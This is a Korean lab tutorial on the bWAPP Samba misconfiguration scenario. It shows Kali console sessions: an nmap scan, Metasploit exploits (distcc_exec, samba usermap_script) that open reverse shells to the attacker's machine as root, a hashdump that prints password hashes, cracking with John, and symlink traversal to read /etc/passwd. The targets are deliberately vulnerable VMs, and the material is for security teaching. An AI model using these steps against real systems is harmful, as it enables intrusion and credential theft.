웹 해킹 bWAPP - 63. A5 - Security Misconfiguration - Arbitrary File Access(Samba)

웹 해킹 bWAPP - 63. A5 - Security Misconfiguration - Arbitrary File Access(Samba)

 

 

본 내용은 교육 과정에서 필요한 실습 목적으로 구성된 것이며, 혹시라도 개인적인 용도 및 악의적인 목적으로 사용할 경우, 법적 책임은 본인에게 있다는 것을 알려드립니다. 

 

 

1. Security Misconfiguration

 

 - OWASP Top10 A5 - 잘못된 보안 구성
 - 서버/시스템/DB/네트워크 장비/웹 설정 요류로 인하여 발생하는 취약점이다.
 - Ex) 디렉토리 리스팅, 에러페이지, 웹페이지 주석, 웹서버 기본 설정, Adobe Flash 취약점, DoS/DDos 공격,

         특정 서비스에 대한 Reverse_TCP 공격, 로컬 권한 취약점, 백업/임시/robots 파일

 

 

 

2. Security Misconfiguration - Arbitrary File Access(Samba)

 

 - 이 시나리오는 Samba 서버가 안전하지 않게 구성되어있어 공격자가 임의의 파일을 읽거나 쓸 수 있는 내용이다.

 

  

Ex1) Insecure DOR(Order Tickets) 이해

 

 

보안 레벨 선택 및 시나리오 선택

 

 

 

Samba 취약점을 이용한 임의적인 파일 접근

 

 

 

root@kali:~# nmap -sS -sV 192.168.20.205

 

Starting Nmap 7.60 ( https://nmap.org ) at 2019-02-15 19:46 KST
Nmap scan report for 192.168.20.205
Host is up (0.00016s latency).
Not shown: 983 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp?
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
25/tcp   open  smtp        Postfix smtpd
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: ITSECGAMES)
443/tcp  open  ssl/http    Apache httpd 2.2.8 ((Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: ITSECGAMES)
512/tcp  open  exec?
513/tcp  open  login?
514/tcp  open  shell?
666/tcp  open  doom?
3306/tcp open  mysql?
5901/tcp open  vnc         VNC (protocol 3.8)
6001/tcp open  X11         (access denied)
8080/tcp open  http        nginx 1.4.0
8443/tcp open  ssl/http    nginx 1.4.0
9080/tcp open  http        lighttpd 1.4.19

 

root@kali:~# msfdb init
root@kali:~# msfdb start
root@kali:~# msfconsole -q

 

msf > search samba

 

~ 중간 생략 ~

 

 

msf > search exploit/unix/misc/distcc_exec

Matching Modules
================

   Name                           Disclosure Date  Rank       Description
   ----                           ---------------  ----       -----------
   exploit/unix/misc/distcc_exec  2002-02-01       excellent  DistCC Daemon Command Execution

 

 

msf > use exploit/unix/misc/distcc_exec
msf exploit(unix/misc/distcc_exec) >
msf exploit(unix/misc/distcc_exec) > show options

Module options (exploit/unix/misc/distcc_exec):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  3632             yes       The target port (TCP)

Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

msf exploit(unix/misc/distcc_exec) > set rhost 192.168.20.205
rhost => 192.168.20.205

msf exploit(unix/misc/distcc_exec) > exploit

[*] Started reverse TCP double handler on 192.168.20.50:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 83ZmNIz6ODbew0G4;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "83ZmNIz6ODbew0G4\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.20.50:4444 -> 192.168.20.205:50644) at 2019-02-15 19:55:00 +0900

 

pwd
/

 

whoami
root

(ctrl+z)

Background session 1? [y/N]  y
msf exploit(unix/misc/distcc_exec) > (ctrl+z)
msf exploit(unix/misc/distcc_exec) >
[1]+  Stopped                 msfconsole -q
root@kali:~#

 

 

 

[참고] 'Metasploitable2'를 대상으로 실시한 Samba 취약점 공격

 

root@kali:~# msfconsole -q

msf > search samba
msf > use exploit/multi/samba/usermap_script
msf exploit(multi/samba/usermap_script) > set rhost 192.168.20.204
msf exploit(multi/samba/usermap_script) > set payload cmd/unix/reverse
msf exploit(multi/samba/usermap_script) > set lhost 192.168.20.50
msf exploit(multi/samba/usermap_script) > exploit

[*] Started reverse TCP double handler on 192.168.20.50:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo Hdv1SQSXJUHz17dT;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "Hdv1SQSXJUHz17dT\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.20.50:4444 -> 192.168.20.204:37731) at 2019-10-25 21:26:09 +0900

id
uid=0(root) gid=0(root)

 

(Ctrl+z)

Background session 1? [y/N]  y

msf exploit(multi/samba/usermap_script) > sessions -i

Active sessions
===============

  Id  Name  Type            Information  Connection
  --  ----  ----            -----------  ----------
  1         shell cmd/unix               192.168.20.50:4444 -> 192.168.20.204:37731 (192.168.20.204)

 

msf exploit(multi/samba/usermap_script) > use post/linux/gather/hashdump
msf post(linux/gather/hashdump) > show options

Module options (post/linux/gather/hashdump):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

 

msf post(linux/gather/hashdump) > set session 1
msf post(linux/gather/hashdump) > exploit

[!] SESSION may not be compatible with this module.
[+] root:$1$/6KSBwIs$u8UzErBHBXEujsUyrt6Z4.:0:0:root:/root:/bin/bash
[+] sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:3:3:sys:/dev:/bin/sh
[+] klog:$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0:103:104::/home/klog:/bin/false
[+] msfadmin:$1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
[+] postgres:$1$Rw35ik.x$MgQgZUuO5pAoUvfJhfcYe/:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
[+] user:$1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0:1001:1001:just a user,111,,:/home/user:/bin/bash
[+] service:$1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu//:1002:1002:,,,:/home/service:/bin/bash
[+] Unshadowed Password File: /root/.msf4/loot/20191025212855_default_192.168.20.204_linux.hashes_003305.txt
[*] Post module execution completed
msf post(linux/gather/hashdump) >
msf post(linux/gather/hashdump) > exit -y

 

root@kali:~# john /root/.msf4/loot/20191025214416_default_192.168.20.204_linux.hashes_414162.txt

 

 

root@kali:~# cp /root/.msf4/loot/20191025214416_default_192.168.20.204_linux.hashes_414162.txt metapass.txt

root@kali:~# johnny &

 

root@kali:~# msfconsole -q

msf > search samba
msf > use auxiliary/admin/smb/samba_symlink_traversal
msf auxiliary(admin/smb/samba_symlink_traversal) > set rhost 192.168.20.204
msf auxiliary(admin/smb/samba_symlink_traversal) > set smbshare tmp
msf auxiliary(admin/smb/samba_symlink_traversal) > exploit
msf auxiliary(admin/smb/samba_symlink_traversal) > exit

root@kali:~# smbclient //192.168.20.204/tmp
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\root's password: toor
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> cd rootfs
smb: \rootfs\> cd etc
smb: \rootfs\etc\> more passwd

 

 

 

[유튜브] 동영상 강의 링크 (구독! 좋아요!!!)

 

웹해킹 63. A5 - bWAPP Security Misconfiguration - Arbitrary File Access(Samba)   https://youtu.be/e32WzC4j7ck